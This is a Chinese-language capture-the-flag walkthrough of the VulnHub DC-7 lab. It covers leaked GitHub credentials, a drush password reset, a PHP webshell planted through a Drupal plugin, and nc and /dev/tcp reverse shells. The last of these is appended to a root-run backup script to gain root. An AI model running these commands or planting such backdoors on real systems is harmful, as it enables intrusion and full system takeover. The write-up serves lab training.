---

一、环境搭建

DC-7下载地址：https://download.vulnhub.com/dc/DC-7.zip
kali：192.168.144.148
DC-7：192.168.144.155

---

二、渗透流程

nmap -T5 -A -p- -sV -sT 192.168.144.155

思路：
1、80端口

目录扫描：dirb、gobuster、dirsearch等工具；
web站点资产识别：goby、whatweb等；
web站点功能页面；
分析网页源代码；
……

2、22端口

ssh爆破、有账号密码信息进行远程登录
……

站点为Drupal，并且发现一个@Dc7User
谷歌发现githu地址：https://github.com/Dc7User/staffdb.git

访问https://github.com/Dc7User/staffdb.git，其存在config.php文件，保存数据库相关信息：username：password=dc7user：MdR3xOgB7#dW

#shh登录：
 ssh dc7user@192.168.144.155

ls
backups文件夹下.gpg格式文件（基于密钥的加密方式）
cat mbox
发现/opt/scripts/backups.sh（可以执行的脚本文件）

cd /opt/scripts/
cat backups.sh

发现drush：drush全称：drupal shell，是专门管理drupal站点的shell。
并且drush命令要在网站根目录执行。
drush user-password username --password="password" #更改密码

cd /var/www/html
drush user-password username --password="pass"  #更改密码

使用admin：pass登录网站
点击Add content–>Basic page，无法执行php代码
因为安全问题，不支持执行php代码，但是可以通过安装插件的方式使其支持执行php

插件下载地址：https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

发现已经支持php代码，在Basic page页面插入一句话木马

蚁剑连接返回的url地址：http://192.168.144.155/node/7

在蚁剑上执行反弹shell命令，将shell反弹到kali上
kali监听：nc -lnvp 4444
蚁剑终端执行：nc -e /bin/sh 192.168.144.148 4444

python -c 'import pty;pty.spawn("/bin/bash")' #kali切换shell外壳

backups.sh文件是root执行的，那我们可以把反弹shell写入执行，获取到的权限也是root权限
kali开启监听：nc -lnvp 1234
反弹shell：echo "bash -i >& /dev/tcp/192.168.144.148/1234 0>&1" >> /opt/scripts/backups.sh

邮件内容提示：15分钟才会看到shell，所以上一步骤执行反弹shell获取不到的，可以稍等一会再查看

---

三、思路总结

1、信息收集
2、github泄露敏感信息
3、通过泄露的账号密码远程登录
4、利用drush执行更改密码操作
5、通过账号密码登录站点
6、通过添加插件执行php一句话木马获取shell
7、将反弹shell，写入利用root权限的可执行脚本文件中，获取root权限。

---

参考链接：https://blog.mzfr.me/vulnhub-writeups/2019-08-31-DC7